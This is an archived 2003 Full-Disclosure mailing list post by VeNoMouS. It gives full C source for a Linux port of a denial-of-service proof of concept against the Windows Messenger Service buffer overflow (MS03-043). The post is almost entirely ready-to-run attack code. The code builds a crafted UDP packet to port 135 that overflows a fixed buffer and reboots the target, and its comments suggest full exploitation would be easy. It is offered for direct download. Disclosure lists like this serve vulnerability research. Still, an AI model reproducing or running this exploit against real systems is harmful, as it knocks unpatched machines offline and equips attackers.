[Full-Disclosure] Linux Ported Version of MS03-043 DOS

• Previous message: jazper: "Re: [Full-Disclosure] Windows covert channel"
• Next in thread: VeNoMouS: "Re: [Full-Disclosure] Linux Ported Version of MS03-043 DOS"
• Reply: VeNoMouS: "Re: [Full-Disclosure] Linux Ported Version of MS03-043 DOS"
• Maybe reply: VeNoMouS: "Re: [Full-Disclosure] Linux Ported Version of MS03-043 DOS"
• Maybe reply: Dowling, Gabrielle: "Re: [Full-Disclosure] Linux Ported Version of MS03-043 DOS"
• Maybe reply: Dowling, Gabrielle: "RE: [Full-Disclosure] Linux Ported Version of MS03-043 DOS"
• Maybe reply: Perrymon, Josh L.: "RE: [Full-Disclosure] Linux Ported Version of MS03-043 DOS"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: <full-disclosure@lists.netsys.com>
Date: Mon, 20 Oct 2003 14:33:03 +1300

Here you go guys or get it via www.gen-x.co.nz/ms03-043.c

<<<<<<<<<<<<<<<<<< SNIP >>>>>>>>>>>>>>>>>>>>>>>>

/*
Mon Oct 20 14:26:55 NZDT 2003

Re-written By VeNoMouS to be ported to linux, and tidy it up a little.
This was only like a 5 minute port but it works and has been tested.
venom@gen-x.co.nz

greets to str0ke and defy

DoS Proof of Concept for MS03-043 - exploitation shouldn't be too hard.
Launching it one or two times against the target should make the
machine reboot. Tested against a Win2K SP4.

"The vulnerability results because the Messenger Service does not
properly validate the length of a message before passing it to the allocated
buffer" according to MS bulletin. Digging into it a bit more, we find that when

a character 0x14 in encountered in the 'body' part of the message, it is
replaced by a CR+LF. The buffer allocated for this operation is twice the size
of the string, which is the way to go, but is then copied to a buffer which
was only allocated 11CAh bytes. Thanks to that, we can bypass the length checks

and overflow the fixed size buffer.

Credits go to LSD :)

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <time.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>

// Packet format found thanks to a bit a sniffing
static unsigned char packet_header[] =
"\x04\x00\x28\x00"
"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0"
"\x4f\xb6\xe6\xfc"
"\xff\xff\xff\xff" // @40 : unique id over 16 bytes ?
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\xff\xff"
"\xff\xff\xff\xff" // @74 : fields length
"\x00\x00";

unsigned char field_header[] =
"\xff\xff\xff\xff" // @0 : field length
"\x00\x00\x00\x00"
"\xff\xff\xff\xff"; // @8 : field length

int usage(char *name)
{
 printf("Proof of Concept for Windows Messenger Service Overflow..\n");
 printf("- Originally By Hanabishi Recca - recca@mail.ru\n\n");
 printf("- Ported to linux by VeNoMouS..\n");
 printf("- venom@gen-x.co.nz\n\n\n");

 printf("example : %s -d yourputtersux -i 10.33.10.4 -s n0nlameputer\n",name);
 printf("\n-d <dest netbios name>\t-i <dest netbios ip>\n");
 printf("-s <src netbios name>\n");
 return 1;
}

int main(int argc,char *argv[])
{
        int i, packet_size, fields_size, s;
        unsigned char packet[8192];
        struct sockaddr_in addr;
  char from[57],machine[57],c;
        char body[4096] = "*** MESSAGE ***";

  if(argc <= 2)
  {
  usage(argv[0]);
  exit(0);
  }

    while ((c = getopt (argc, argv, "d:i:s:h")) != EOF)
  switch(c)
   {
   case 'd':
      strncpy(machine,optarg,sizeof(machine));
      printf("Machine is %s\n",machine);
      break;
   case 'i':
            memset(&addr, 0,sizeof(addr));
            addr.sin_family = AF_INET;
            addr.sin_addr.s_addr = inet_addr(optarg);
            addr.sin_port = htons(135);
      break;
   case 's':
            strncpy(from,optarg,sizeof(from));
      break;

   case 'h':
      usage(argv[0]);
      exit(0);
      break;
   }
      
        // A few conditions :
        // 0 <= strlen(from) + strlen(machine) <= 56
        // max fields size 3992

  if(!addr.sin_addr.s_addr) { printf("Ummm MOFO we need a dest IP...\n"); exit(0); }

        if(!strlen(machine)) { printf("Ummmm we also need the dest netbios name bro...\n"); exit(0); }

  if(!strlen(from)) strcpy(from,"tolazytotype");

        memset(packet,0, sizeof(packet));
        packet_size = 0;

        memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1);
        packet_size += sizeof(packet_header) - 1;

        i = strlen(from) + 1;
        *(unsigned int *)(&field_header[0]) = i;
        *(unsigned int *)(&field_header[8]) = i;
        memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
        packet_size += sizeof(field_header) - 1;
        strcpy(&packet[packet_size], from);
        packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4

        i = strlen(machine) + 1;
        *(unsigned int *)(&field_header[0]) = i;
        *(unsigned int *)(&field_header[8]) = i;
        memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
        packet_size += sizeof(field_header) - 1;
        strcpy(&packet[packet_size], machine);
        packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4

        fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n", 3992 - packet_size + sizeof(packet_header) - sizeof(field_header));
        memset(body, 0x14, sizeof(body));
        body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0';

        i = strlen(body) + 1;
        *(unsigned int *)(&field_header[0]) = i;
        *(unsigned int *)(&field_header[8]) = i;
        memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
        packet_size += sizeof(field_header) - 1;
        strcpy(&packet[packet_size], body);
        packet_size += i;

        fields_size = packet_size - (sizeof(packet_header) - 1);
        *(unsigned int *)(&packet[40]) = time(NULL);
        *(unsigned int *)(&packet[74]) = fields_size;

        fprintf(stdout, "Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from) + strlen(machine) + strlen(body),packet_size, fields_size);

 if ((s = socket (AF_INET, SOCK_DGRAM, 0)) == -1 )
  {
   perror("Error socket() - ");
   exit(0);
  }
 
        if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1)
  {
   perror("Error sendto() - ");
   exit(0);
  }

        exit(0);
}

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

• Previous message: jazper: "Re: [Full-Disclosure] Windows covert channel"
• Next in thread: VeNoMouS: "Re: [Full-Disclosure] Linux Ported Version of MS03-043 DOS"
• Reply: VeNoMouS: "Re: [Full-Disclosure] Linux Ported Version of MS03-043 DOS"
• Maybe reply: VeNoMouS: "Re: [Full-Disclosure] Linux Ported Version of MS03-043 DOS"
• Maybe reply: Dowling, Gabrielle: "Re: [Full-Disclosure] Linux Ported Version of MS03-043 DOS"
• Maybe reply: Dowling, Gabrielle: "RE: [Full-Disclosure] Linux Ported Version of MS03-043 DOS"
• Maybe reply: Perrymon, Josh L.: "RE: [Full-Disclosure] Linux Ported Version of MS03-043 DOS"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]